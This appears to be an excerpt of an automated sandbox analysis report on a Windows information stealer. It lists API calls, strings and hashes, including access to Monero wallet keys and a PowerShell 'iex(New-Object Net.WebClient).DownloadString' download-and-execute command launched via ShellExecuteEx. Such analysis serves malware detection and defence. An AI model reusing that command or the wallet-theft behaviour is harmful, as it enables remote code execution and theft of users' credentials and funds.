                      • Opcode Fuzzy Hash: c842f045d6caf00ce626804cb5671d4477f231b9ea87c1a5eacac519b331a16b
                      • Instruction Fuzzy Hash: 82F05E32D18209EFD3489FE0E909B6C7B70FB45703F040199E60D86290E6784B82AB97
                      APIs
                      • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00734FCA
                      • RtlAllocateHeap.NTDLL(00000000), ref: 00734FD1
                      • InternetOpenA.WININET(00750DDF,00000000,00000000,00000000,00000000), ref: 00734FEA
                      • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00735011
                      • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00735041
                      • InternetCloseHandle.WININET(?), ref: 007350B9
                      • InternetCloseHandle.WININET(?), ref: 007350C6
                      Memory Dump Source
                      • Source File: 00000000.00000002.2169991722.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_730000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                      • String ID:
                      • API String ID: 3066467675-0
                      • Opcode ID: 80595082773bec450f0ee5307837138fa7dc266c2e606eeb0213ec84177b4e33
                      • Instruction ID: 9b4a3867e8092386314e655a3372d4d3b0864bda6fb9c11b7f8b4eb7a2bb79e8
                      • Opcode Fuzzy Hash: 80595082773bec450f0ee5307837138fa7dc266c2e606eeb0213ec84177b4e33
                      • Instruction Fuzzy Hash: 223125B5E04218EBDB24CF54DC85BDCB7B8EB48704F1081D8EA09A7281C7746AC58F99
                      APIs
                      • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00748426
                      • wsprintfA.USER32 ref: 00748459
                      • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0074847B
                      • RegCloseKey.ADVAPI32(00000000), ref: 0074848C
                      • RegCloseKey.ADVAPI32(00000000), ref: 00748499
                        • Part of subcall function 0074A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0074A7E6
                      • RegQueryValueExA.ADVAPI32(00000000,013EDF70,00000000,000F003F,?,00000400), ref: 007484EC
                      • lstrlen.KERNEL32(?), ref: 00748501
                      • RegQueryValueExA.ADVAPI32(00000000,013EDFA0,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00750B34), ref: 00748599
                      • RegCloseKey.ADVAPI32(00000000), ref: 00748608
                      • RegCloseKey.ADVAPI32(00000000), ref: 0074861A
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2169991722.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_730000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                      • String ID: %s\%s
                      • API String ID: 3896182533-4073750446
                      • Opcode ID: 68dd3a54465ff8e3cbf296bb963e99a33fb39865430785cf01ff808e6736384e
                      • Instruction ID: f766363f94364dc84da2182a5c14098b638e5003671648d5861049bacdc99fa6
                      • Opcode Fuzzy Hash: 68dd3a54465ff8e3cbf296bb963e99a33fb39865430785cf01ff808e6736384e
                      • Instruction Fuzzy Hash: 342107B2A1421CABDB64DB54DC85FE9B3B8FB88700F00C198A609A6180DF756A85CFD5
                      APIs
                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 007476A4
                      • RtlAllocateHeap.NTDLL(00000000), ref: 007476AB
                      • RegOpenKeyExA.ADVAPI32(80000002,013DB818,00000000,00020119,00000000), ref: 007476DD
                      • RegQueryValueExA.ADVAPI32(00000000,013EDF88,00000000,00000000,?,000000FF), ref: 007476FE
                      • RegCloseKey.ADVAPI32(00000000), ref: 00747708
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2169991722.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_730000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap$AllocateCloseOpenProcessQueryValue
                      • String ID: Windows 11
                      • API String ID: 3225020163-2517555085
                      • Opcode ID: babea9b53206cfc9b97fc430fe2492f02360795fbb431c9c7aa9f829efeb43c2
                      • Instruction ID: abef00d574fe159630cb22428049077e7f95abf2d12ec4a0e8e41e96c21487dd
                      • Opcode Fuzzy Hash: babea9b53206cfc9b97fc430fe2492f02360795fbb431c9c7aa9f829efeb43c2
                      • Instruction Fuzzy Hash: 0F0162B6A58204FFD704DBE4DC49FADB7B8EB88701F104454FA08D7291E7749944DB92
                      APIs
                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00747734
                      • RtlAllocateHeap.NTDLL(00000000), ref: 0074773B
                      • RegOpenKeyExA.ADVAPI32(80000002,013DB818,00000000,00020119,007476B9), ref: 0074775B
                      • RegQueryValueExA.ADVAPI32(007476B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 0074777A
                      • RegCloseKey.ADVAPI32(007476B9), ref: 00747784
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2169991722.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_730000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap$AllocateCloseOpenProcessQueryValue
                      • String ID: CurrentBuildNumber
                      • API String ID: 3225020163-1022791448
                      • Opcode ID: 8d549b6b22d2bcdb23726423b012ea17e1b62f06b8b5d72284f72409486389ba
                      • Instruction ID: 93ea107ea263843ae071fe9fcf440cfe4606be264424dec4915fdb5d1745421b
                      • Opcode Fuzzy Hash: 8d549b6b22d2bcdb23726423b012ea17e1b62f06b8b5d72284f72409486389ba
                      • Instruction Fuzzy Hash: C70144F6A54308BBD700DBE0DC49FAEB7B8EB44701F004554FA09A7281DB7455409B92
                      APIs
                      • CreateFileA.KERNEL32(:t,80000000,00000003,00000000,00000003,00000080,00000000,?,00743AEE,?), ref: 007492FC
                      • GetFileSizeEx.KERNEL32(000000FF,:t), ref: 00749319
                      • CloseHandle.KERNEL32(000000FF), ref: 00749327
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2169991722.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_730000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: File$CloseCreateHandleSize
                      • String ID: :t$:t
                      • API String ID: 1378416451-3646547331
                      • Opcode ID: 3ac8be224287e149a61ebdfa5d20399056cf12e1643528ba08768250a8da4cb7
                      • Instruction ID: f5f33ad05f0b3c5091b8bee8f453e4813e2e8a5123759b2025bbf5bb3059894c
                      • Opcode Fuzzy Hash: 3ac8be224287e149a61ebdfa5d20399056cf12e1643528ba08768250a8da4cb7
                      • Instruction Fuzzy Hash: 80F04936F58208BBDB14DFB0DC49F9E77B9AB88721F10C254BA55A72C0D774AA419B40
                      APIs
                      • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 007399EC
                      • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00739A11
                      • LocalAlloc.KERNEL32(00000040,?), ref: 00739A31
                      • ReadFile.KERNEL32(000000FF,?,00000000,0073148F,00000000), ref: 00739A5A
                      • LocalFree.KERNEL32(0073148F), ref: 00739A90
                      • CloseHandle.KERNEL32(000000FF), ref: 00739A9A
                      Memory Dump Source
                      • Source File: 00000000.00000002.2169991722.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_730000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                      • String ID:
                      • API String ID: 2311089104-0
                      • Opcode ID: 550b92a31332c8c96b2460fe7da762fc796f87f7ff9b6094a6271cc97c11261b
                      • Instruction ID: 989d94641bc933a0d4a66e92b136162bc6c8bdffad80b1ee5e0165d01a9dc33f
                      • Opcode Fuzzy Hash: 550b92a31332c8c96b2460fe7da762fc796f87f7ff9b6094a6271cc97c11261b
                      • Instruction Fuzzy Hash: 19314D74A00209EFEB14DF94C885BEE77F5FF48301F108258E915A7290D778A981DFA1
                      APIs
                      • lstrcat.KERNEL32(?,013ED838), ref: 007447DB
                        • Part of subcall function 00748DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00748E0B
                      • lstrcat.KERNEL32(?,00000000), ref: 00744801
                      • lstrcat.KERNEL32(?,?), ref: 00744820
                      • lstrcat.KERNEL32(?,?), ref: 00744834
                      • lstrcat.KERNEL32(?,013DAF00), ref: 00744847
                      • lstrcat.KERNEL32(?,?), ref: 0074485B
                      • lstrcat.KERNEL32(?,013ED658), ref: 0074486F
                        • Part of subcall function 0074A740: lstrcpy.KERNEL32(00750E17,00000000), ref: 0074A788
                        • Part of subcall function 00748D90: GetFileAttributesA.KERNEL32(00000000,?,00731B54,?,?,0075564C,?,?,00750E1F), ref: 00748D9F
                        • Part of subcall function 00744570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00744580
                        • Part of subcall function 00744570: RtlAllocateHeap.NTDLL(00000000), ref: 00744587
                        • Part of subcall function 00744570: wsprintfA.USER32 ref: 007445A6
                        • Part of subcall function 00744570: FindFirstFileA.KERNEL32(?,?), ref: 007445BD
                      Memory Dump Source
                      • Source File: 00000000.00000002.2169991722.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_730000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                      • String ID:
                      • API String ID: 2540262943-0
                      • Opcode ID: c40e583faaedb26df765b794b4eea598e0170a02cb35052a93bac0d81dd798bd
                      • Instruction ID: e704296fa89582bc2d0f2ae376fc664767e9238103045ee42e71a67cd11a1e96
                      • Opcode Fuzzy Hash: c40e583faaedb26df765b794b4eea598e0170a02cb35052a93bac0d81dd798bd
                      • Instruction Fuzzy Hash: 123156B291020CA7DB54F7B0DC89EED737CAB98700F404589B31996081DF78ABC98B96
                      APIs
                        • Part of subcall function 0074A740: lstrcpy.KERNEL32(00750E17,00000000), ref: 0074A788
                        • Part of subcall function 0074A9B0: lstrlen.KERNEL32(?,013E8B50,?,\Monero\wallet.keys,00750E17), ref: 0074A9C5
                        • Part of subcall function 0074A9B0: lstrcpy.KERNEL32(00000000), ref: 0074AA04
                        • Part of subcall function 0074A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0074AA12
                        • Part of subcall function 0074A920: lstrcpy.KERNEL32(00000000,?), ref: 0074A972
                        • Part of subcall function 0074A920: lstrcat.KERNEL32(00000000), ref: 0074A982
                        • Part of subcall function 0074A8A0: lstrcpy.KERNEL32(?,00750E17), ref: 0074A905
                      • ShellExecuteEx.SHELL32(0000003C), ref: 00742D85
                      Strings
                      • ')", xrefs: 00742CB3
                      • <, xrefs: 00742D39
                      • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00742CC4
                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00742D04
                      Memory Dump Source
                      • Source File: 00000000.00000002.2169991722.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_730000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                      • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      • API String ID: 3031569214-898575020
                      • Opcode ID: 9c177e8f5d28da45ca408c727563ef8e13e34e7ec622b35fd97656c4585c657f
                      • Instruction ID: 3cb536422bacb4f73bcb0e9cbc9ff35f50cc5eeff82084a86e9b04a7fa2b350f
                      • Opcode Fuzzy Hash: 9c177e8f5d28da45ca408c727563ef8e13e34e7ec622b35fd97656c4585c657f
                      • Instruction Fuzzy Hash: F041F171D50208EAEB15FFA0C89ABEDB778EF14304F504029F416A7192DF782A4ACF91
                      APIs
                      • LocalAlloc.KERNEL32(00000040,?), ref: 00739F41
                        • Part of subcall function 0074A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0074A7E6
                        • Part of subcall function 0074A740: lstrcpy.KERNEL32(00750E17,00000000), ref: 0074A788
                      Similarity
                      • API ID: lstrcpy$AllocLocal
                      • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                      • API String ID: 4171519190-1096346117
                      • Opcode ID: 967c9bd821a8c08eedc755fd1605c12da44b4000b7b4b5f866a9b7dee07b941a
                      • Instruction ID: bb928b9302f9041c71f0d4cb046d3ca0a980c8467cb2053191fa9232e0d6603b
                      • Opcode Fuzzy Hash: 967c9bd821a8c08eedc755fd1605c12da44b4000b7b4b5f866a9b7dee07b941a
                      • Instruction Fuzzy Hash: CF613771A50248EFEB24EFA4CC9AFED7775AF44304F408118F90A5F192EB786A05CB91
                      APIs
                      • RegOpenKeyExA.ADVAPI32(80000001,013ED478,00000000,00020119,?), ref: 007440F4
                      • RegQueryValueExA.ADVAPI32(?,013ED880,00000000,00000000,00000000,000000FF), ref: 00744118
                      • RegCloseKey.ADVAPI32(?), ref: 00744122
                      • lstrcat.KERNEL32(?,00000000), ref: 00744147
                      • lstrcat.KERNEL32(?,013ED8C8), ref: 0074415B
                      Similarity
                      • API ID: lstrcat$CloseOpenQueryValue
                      • String ID:
                      • API String ID: 690832082-0
                      • Opcode ID: 26fcee0180b8b2f4b02a00c1e5bca89d2f3c0da412c006d9c85a62949396b1db
                      • Instruction ID: c90f3ccf7efdc5107f545acb5b9392df3e629f02a51908e8ad69e3a794179a89
                      • Opcode Fuzzy Hash: 26fcee0180b8b2f4b02a00c1e5bca89d2f3c0da412c006d9c85a62949396b1db
                      • Instruction Fuzzy Hash: F74148B7D10108ABDB14FBA0DC5AFFE737DAB88300F404558B62996181EA755BD88B92
                      APIs
                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00747E37
                      • RtlAllocateHeap.NTDLL(00000000), ref: 00747E3E
                      • RegOpenKeyExA.ADVAPI32(80000002,013DB7A8,00000000,00020119,?), ref: 00747E5E
                      • RegQueryValueExA.ADVAPI32(?,013ED718,00000000,00000000,000000FF,000000FF), ref: 00747E7F
                      • RegCloseKey.ADVAPI32(?), ref: 00747E92
                      Similarity
                      • API ID: Heap$AllocateCloseOpenProcessQueryValue
                      • String ID:
                      • API String ID: 3225020163-0
                      • Opcode ID: 5ed2b5f72ad23cb4075a48ad98a0e71a146f95b5b03804fc41e0af18516983fb
                      • Instruction ID: 565838a3f15e9f8a2e4cf7f7572c4596fc484d35a4b6abe0e6d492e9db489cdb
                      • Opcode Fuzzy Hash: 5ed2b5f72ad23cb4075a48ad98a0e71a146f95b5b03804fc41e0af18516983fb
                      • Instruction Fuzzy Hash: AC119EB2A48205EBD714CF94DC49FBFBBB8FB44B01F104259FA09A7280D7785800DBA2
                      APIs
                      • StrStrA.SHLWAPI(013ED820,?,?,?,0074140C,?,013ED820,00000000), ref: 0074926C
                      • lstrcpyn.KERNEL32(0097AB88,013ED820,013ED820,?,0074140C,?,013ED820), ref: 00749290
                      • lstrlen.KERNEL32(?,?,0074140C,?,013ED820), ref: 007492A7
                      • wsprintfA.USER32 ref: 007492C7
                      Similarity
                      • API ID: lstrcpynlstrlenwsprintf
                      • String ID: %s%s
                      • API String ID: 1206339513-3252725368
                      • Opcode ID: c39b6a032a55a14b41ed04f07b1266c42736f94b46b8b20a8eff38a3e8b8c59b
                      • Instruction ID: 3318c50862d2f62da51926661aedd7bbecff27418c6c1c34f0c499409a5b56f2
                      • Opcode Fuzzy Hash: c39b6a032a55a14b41ed04f07b1266c42736f94b46b8b20a8eff38a3e8b8c59b
                      • Instruction Fuzzy Hash: E401A976504208FFCB04DFE8C984EAE7BB9EB84365F108148F9099B204C675AA40DBD5
                      APIs
                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 007312B4
                      • RtlAllocateHeap.NTDLL(00000000), ref: 007312BB
                      • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 007312D7
                      • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 007312F5
                      • RegCloseKey.ADVAPI32(?), ref: 007312FF
                      Similarity
                      • API ID: Heap$AllocateCloseOpenProcessQueryValue
                      • String ID:
                      • API String ID: 3225020163-0
                      • Opcode ID: 94b0e5d0fafb07a18d03006327a6e705ffe999967dab6c2453d2a0b9c72a0a36
                      • Instruction ID: 35661ef61d7ec6be0127a40ad5e4a03b931feae88d6c7f610b25dc2ef12b2b0d
                      • Opcode Fuzzy Hash: 94b0e5d0fafb07a18d03006327a6e705ffe999967dab6c2453d2a0b9c72a0a36
                      • Instruction Fuzzy Hash: C70131BAA54208BBDB04DFE0DC49FAEB7B8EB88701F008159FA0997280D6749A419F51
                      APIs
                      Similarity
                      • API ID: String___crt$Type
                      • String ID:
                      • API String ID: 2109742289-3916222277
                      • Opcode ID: 969f6c6d2592dcda27a78e7ddc0b12b14b3c3f5a68f68c47f9beac00d14ef782
                      • Instruction ID: 69ff631d7f336cc485bd0e177b4997891bc6d248bf433756b28af0b1184147a9
                      • Opcode Fuzzy Hash: 969f6c6d2592dcda27a78e7ddc0b12b14b3c3f5a68f68c47f9beac00d14ef782
                      • Instruction Fuzzy Hash: 7F41E87150175CAFDB228B248D85FFBBBEC9F45704F1444E8E5CA86182E375AA448F60
                      APIs
                      • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00746663
                        • Part of subcall function 0074A740: lstrcpy.KERNEL32(00750E17,00000000), ref: 0074A788
                        • Part of subcall function 0074A9B0: lstrlen.KERNEL32(?,013E8B50,?,\Monero\wallet.keys,00750E17), ref: 0074A9C5
                        • Part of subcall function 0074A9B0: lstrcpy.KERNEL32(00000000), ref: 0074AA04
                        • Part of subcall function 0074A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0074AA12
                        • Part of subcall function 0074A8A0: lstrcpy.KERNEL32(?,00750E17), ref: 0074A905
                      • ShellExecuteEx.SHELL32(0000003C), ref: 00746726
                      • ExitProcess.KERNEL32 ref: 00746755
                      Similarity
                      • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                      • String ID: <
                      • API String ID: 1148417306-4251816714
                      • Opcode ID: ffb7030ac472e1a47b8d8a49126af35adafbabece9eb81abcf1faf98daa4fab8
                      • Instruction ID: 2a9ae30dd6e8d55f1be46abb08b92907c9ac49bb0a70e3435452fecddbb71802
                      • Opcode Fuzzy Hash: ffb7030ac472e1a47b8d8a49126af35adafbabece9eb81abcf1faf98daa4fab8
                      • Instruction Fuzzy Hash: D2314DB2C51208EADB15EB50DC86BDD777CAF44300F404198F20966191DF786B88CF56
                      APIs
                      • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00750E28,00000000,?), ref: 0074882F
                      • RtlAllocateHeap.NTDLL(00000000), ref: 00748836
                      • wsprintfA.USER32 ref: 00748850
                        • Part of subcall function 0074A740: lstrcpy.KERNEL32(00750E17,00000000), ref: 0074A788
                      Similarity
                      • API ID: Heap$AllocateProcesslstrcpywsprintf
                      • String ID: %dx%d
                      • API String ID: 1695172769-2206825331
                      • Opcode ID: 034488dc9ab3a7bb2c8e4630d4156bd73c62dfc3ab6266d9a1064524eb27a7da
                      • Instruction ID: 8fd6ee9cf941b69272b4f7535935de876aea908a5dd703f80f5b78b9d81496f0
                      • Opcode Fuzzy Hash: 034488dc9ab3a7bb2c8e4630d4156bd73c62dfc3ab6266d9a1064524eb27a7da
                      • Instruction Fuzzy Hash: 042145B2E54204AFDB04DFD4DD45FAEB7B8FB48701F104159F509A7280C7795940DBA2
                      APIs
                      • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0074951E,00000000), ref: 00748D5B
                      • RtlAllocateHeap.NTDLL(00000000), ref: 00748D62
                      • wsprintfW.USER32 ref: 00748D78
                      Similarity
                      • API ID: Heap$AllocateProcesswsprintf
                      • String ID: %hs
                      • API String ID: 769748085-2783943728
                      • Opcode ID: 2cbc273a3c1d7730ebe75bf894ac9ad8adca6ea56caa6d77b0f7b087854a1d72
                      • Instruction ID: fe229aea99fc32efd32934b0a17ca1cf4f5b38e2377af9f98e0e382cd0dfba5f
                      • Opcode Fuzzy Hash: 2cbc273a3c1d7730ebe75bf894ac9ad8adca6ea56caa6d77b0f7b087854a1d72
                      • Instruction Fuzzy Hash: 75E08CB2A54208BBC700DB94DC0AEAD77BCEB84702F040094FD0D87280DA75AE50ABA2
                      APIs
                        • Part of subcall function 0074A740: lstrcpy.KERNEL32(00750E17,00000000), ref: 0074A788
                        • Part of subcall function 0074A9B0: lstrlen.KERNEL32(?,013E8B50,?,\Monero\wallet.keys,00750E17), ref: 0074A9C5
                        • Part of subcall function 0074A9B0: lstrcpy.KERNEL32(00000000), ref: 0074AA04
                        • Part of subcall function 0074A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0074AA12
                        • Part of subcall function 0074A8A0: lstrcpy.KERNEL32(?,00750E17), ref: 0074A905
                        • Part of subcall function 00748B60: GetSystemTime.KERNEL32(00750E1A,013E9998,007505AE,?,?,007313F9,?,0000001A,00750E1A,00000000,?,013E8B50,?,\Monero\wallet.keys,00750E17), ref: 00748B86
                        • Part of subcall function 0074A920: lstrcpy.KERNEL32(00000000,?), ref: 0074A972
                        • Part of subcall function 0074A920: lstrcat.KERNEL32(00000000), ref: 0074A982
                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0073A2E1 [bFailIfExists = 1; the copy is read (lstrlen below) and then removed again with DeleteFileA at 0073A743]
                      • lstrlen.KERNEL32(00000000,00000000), ref: 0073A3FF
                      • lstrlen.KERNEL32(00000000), ref: 0073A6BC
                        • Part of subcall function 0074A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0074A7E6
                      • DeleteFileA.KERNEL32(00000000), ref: 0073A743
                      Memory Dump Source
                      • Source File: 00000000.00000002.2169991722.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                      • Associated: 00000000.00000002.2169976541.0000000000730000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2169991722.00000000007E1000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2169991722.00000000007ED000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2169991722.0000000000812000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2169991722.000000000097A000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170153838.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170153838.0000000000B15000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170153838.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170153838.0000000000C15000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170153838.0000000000C1C000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170153838.0000000000C2B000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170420150.0000000000C2C000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170581218.0000000000DCA000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170595890.0000000000DCB000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_730000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                      • String ID:
                      • API String ID: 211194620-0
                      • Opcode ID: 5e67f2b7486da5e2cc6c565161b2345e86f20d126a4d174bc3e2e9d2acf47a4d
                      • Instruction ID: 6572173ee20c28a1d61e7c84ae26954da52f2fd61711d16b2bea9c61ba9ba16f
                      • Opcode Fuzzy Hash: 5e67f2b7486da5e2cc6c565161b2345e86f20d126a4d174bc3e2e9d2acf47a4d
                      • Instruction Fuzzy Hash: F1E1EE72950108FAEB05FBA4DC9AEEE737CEF54304F508169F51672091EF386A49CB62
                      APIs
                        • Part of subcall function 0074A740: lstrcpy.KERNEL32(00750E17,00000000), ref: 0074A788
                        • Part of subcall function 0074A9B0: lstrlen.KERNEL32(?,013E8B50,?,\Monero\wallet.keys,00750E17), ref: 0074A9C5
                        • Part of subcall function 0074A9B0: lstrcpy.KERNEL32(00000000), ref: 0074AA04
                        • Part of subcall function 0074A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0074AA12
                        • Part of subcall function 0074A8A0: lstrcpy.KERNEL32(?,00750E17), ref: 0074A905
                        • Part of subcall function 00748B60: GetSystemTime.KERNEL32(00750E1A,013E9998,007505AE,?,?,007313F9,?,0000001A,00750E1A,00000000,?,013E8B50,?,\Monero\wallet.keys,00750E17), ref: 00748B86
                        • Part of subcall function 0074A920: lstrcpy.KERNEL32(00000000,?), ref: 0074A972
                        • Part of subcall function 0074A920: lstrcat.KERNEL32(00000000), ref: 0074A982
                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0073D481
                      • lstrlen.KERNEL32(00000000), ref: 0073D698
                      • lstrlen.KERNEL32(00000000), ref: 0073D6AC
                      • DeleteFileA.KERNEL32(00000000), ref: 0073D72B
                      Memory Dump Source
                      • Source File: 00000000.00000002.2169991722.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                      • Associated: same 14 associated dumps as listed above (identical for every function record in this snapshot)
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_730000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                      • String ID:
                      • API String ID: 211194620-0
                      • Opcode ID: d8dbe15b58881e0c810d995afe8763268c25f94621ae78717de2decbb8b92e6f
                      • Instruction ID: 8bbed56c3ae772983837476fac4307c7b7bfa7a9ac8893b577cbd93765c615a7
                      • Opcode Fuzzy Hash: d8dbe15b58881e0c810d995afe8763268c25f94621ae78717de2decbb8b92e6f
                      • Instruction Fuzzy Hash: 73910172950108EAEB05FBA0DC9AEEE737CEF54304F514168F51666092EF386A49CB62
                      APIs
                        • Part of subcall function 0074A740: lstrcpy.KERNEL32(00750E17,00000000), ref: 0074A788
                        • Part of subcall function 0074A9B0: lstrlen.KERNEL32(?,013E8B50,?,\Monero\wallet.keys,00750E17), ref: 0074A9C5
                        • Part of subcall function 0074A9B0: lstrcpy.KERNEL32(00000000), ref: 0074AA04
                        • Part of subcall function 0074A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0074AA12
                        • Part of subcall function 0074A8A0: lstrcpy.KERNEL32(?,00750E17), ref: 0074A905
                        • Part of subcall function 00748B60: GetSystemTime.KERNEL32(00750E1A,013E9998,007505AE,?,?,007313F9,?,0000001A,00750E1A,00000000,?,013E8B50,?,\Monero\wallet.keys,00750E17), ref: 00748B86
                        • Part of subcall function 0074A920: lstrcpy.KERNEL32(00000000,?), ref: 0074A972
                        • Part of subcall function 0074A920: lstrcat.KERNEL32(00000000), ref: 0074A982
                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0073D801
                      • lstrlen.KERNEL32(00000000), ref: 0073D99F
                      • lstrlen.KERNEL32(00000000), ref: 0073D9B3
                      • DeleteFileA.KERNEL32(00000000), ref: 0073DA32
                      Memory Dump Source
                      • Source File: 00000000.00000002.2169991722.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                      • Associated: same 14 associated dumps as listed above (identical for every function record in this snapshot)
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_730000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                      • String ID:
                      • API String ID: 211194620-0
                      • Opcode ID: 0e58c7887d4d11c09ad98ef06a00d801756582464a8a9f70054d0ccaec503044
                      • Instruction ID: 1b4f3dc9189dec01af0657865f6445aa9cd949f0534e60259f62b6c848db7e41
                      • Opcode Fuzzy Hash: 0e58c7887d4d11c09ad98ef06a00d801756582464a8a9f70054d0ccaec503044
                      • Instruction Fuzzy Hash: 71812472954104EBEB05FBA0DC5ADEE737DEF54304F414528F407A6092EF386A09CB62
                      Strings
                      • st, xrefs: 007472AE, 00747179, 0074717C
                      • st, xrefs: 00747111
                      • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 0074718C [hex of the ASCII string eyAidHlwIjogIkpXVCIsICJhbGciOiAiRWREU0EiIH0, which is unpadded base64 for the JWT header { "typ": "JWT", "alg": "EdDSA" }]
                      Memory Dump Source
                      • Source File: 00000000.00000002.2169991722.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                      • Associated: same 14 associated dumps as listed above (identical for every function record in this snapshot)
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_730000_file.jbxd
                      Yara matches
                      Similarity
